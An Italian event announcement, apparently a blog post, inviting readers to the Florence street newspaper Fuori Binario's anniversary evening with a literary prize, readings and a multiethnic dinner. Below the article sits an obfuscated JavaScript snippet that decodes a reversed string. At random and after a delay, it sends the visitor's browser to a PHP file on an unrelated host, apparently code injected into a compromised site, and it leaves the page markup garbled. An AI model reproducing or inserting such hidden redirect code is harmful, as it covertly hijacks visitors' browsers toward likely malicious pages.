Fuori Binario, 18 anni di resistenza dal basso

image_pdfimage_print

Domani giovedì 21 giugno il giornale di strada “luogo di incontro, accoglienza e proposta” in via dell’Ardiglione 11 rosso (una traversa di via dei Serragli).
Alle 18 sarà premiato il vincitore della terza edizione del Premio letterario Vittorio Porfito, promosso da Fuori Binario, seguiranno poi delle letture dal libro “Il degrado, cos’è”, con la partecipazione della poetessa Alberta Bigagli, di Concetta Pellicanò, presidente Associazione per la memoria viva di San Salvi, e di Don Alessandro Santoro, della Comunità delle Piagge.

Ovviamente sarà presente Mariapia Passigli, che di Fuori Binario è il pilastro fondante, e che con energia inesauribile porta avanti e coordina le tante attività collegate, dalla bottega di via Gioberti alla redazione e distribuzione del giornale, senza dimenticare la presenza a fianco dei senza casa, degli sfrattati, di chi subisce più pesantemente prima la crisi e poi le cosiddette misure anticrisi.
In chiusura della serata cibo e musica all’insegna della multietnicità, dal couscous alla panzanella, perché Fuori Binario naturalmente è antirazzista e da sempre si batte per l’accoglienza di tutti e contro la disgustosa “guerra fra poveri” che il potere invece alimenta. In quest’ottica ad esempio ha arruolato tra i distributori del giornale alcuni rom, che grazie alla vendita di Fuori binario possono svolgere un’esistenza dignitosa.
Insomma, non ci sono scuse per mancare a questo appuntamento con una delle poche realtà fiorentine di autogestione e resistenza dal basso.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/06/premio.jpg”>

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *